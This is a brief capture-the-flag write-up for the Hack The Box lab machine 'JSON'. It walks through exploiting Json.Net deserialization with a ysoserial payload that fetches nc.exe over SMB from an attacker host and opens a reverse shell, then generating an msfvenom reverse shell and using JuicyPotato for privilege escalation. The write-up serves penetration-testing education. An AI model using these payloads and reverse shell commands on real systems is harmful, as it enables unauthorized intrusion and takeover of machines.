Hack The Box - JSON

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/JSON%20Box%207a7191ff3cb142f6a2ae60adf360bb57/Untitled.png

NMAP

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/JSON%20Box%207a7191ff3cb142f6a2ae60adf360bb57/Untitled%201.png

Enumerating

⇒ There’s an login page on the website, we are able to login with admin : admin credentials.

→ When we login we notice that it sends an request to /api/Account/ :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/JSON%20Box%207a7191ff3cb142f6a2ae60adf360bb57/Untitled%202.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/JSON%20Box%207a7191ff3cb142f6a2ae60adf360bb57/Untitled%203.png

⇒ If we changed the Bearer: to something random we get the following errors :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/JSON%20Box%207a7191ff3cb142f6a2ae60adf360bb57/Untitled%204.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/JSON%20Box%207a7191ff3cb142f6a2ae60adf360bb57/Untitled%205.png

→ We see that its performing deserialization on the json object. We can leverage this to get code execution on the system.

Exploiting JSON Deserialization

⇒ We will use ysoserial to create json serialized payload :

https://github.com/frohoff/ysoserial

→ Generating Payload :

.\ysoserial.exe -g ObjectDataProvider -f Json.Net -c “net use \10.10.14.8\enox & \10.10.14.8\enox\nc.exe -e cmd.exe 10.10.14.8 4444” -o base64

→ Hosting nc.exe using smb :

smbserver.py enox . -smb2support

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/JSON%20Box%207a7191ff3cb142f6a2ae60adf360bb57/Untitled%206.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/JSON%20Box%207a7191ff3cb142f6a2ae60adf360bb57/Untitled%207.png

Privilege Escalation to Administrator

⇒ We see that our user has SeImpersonatePrivilege which we can exploit using JuicyPotato :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/JSON%20Box%207a7191ff3cb142f6a2ae60adf360bb57/Untitled%208.png

Link : https://github.com/ohpe/juicy-potato/releases

→ Generating shell :

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=5555 -f exe -o reverse.exe

→ Running juicypotato :

.\JuicyPotato.exe -t * -p \tmp\reverse.exe -l 9001 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/JSON%20Box%207a7191ff3cb142f6a2ae60adf360bb57/Untitled%209.png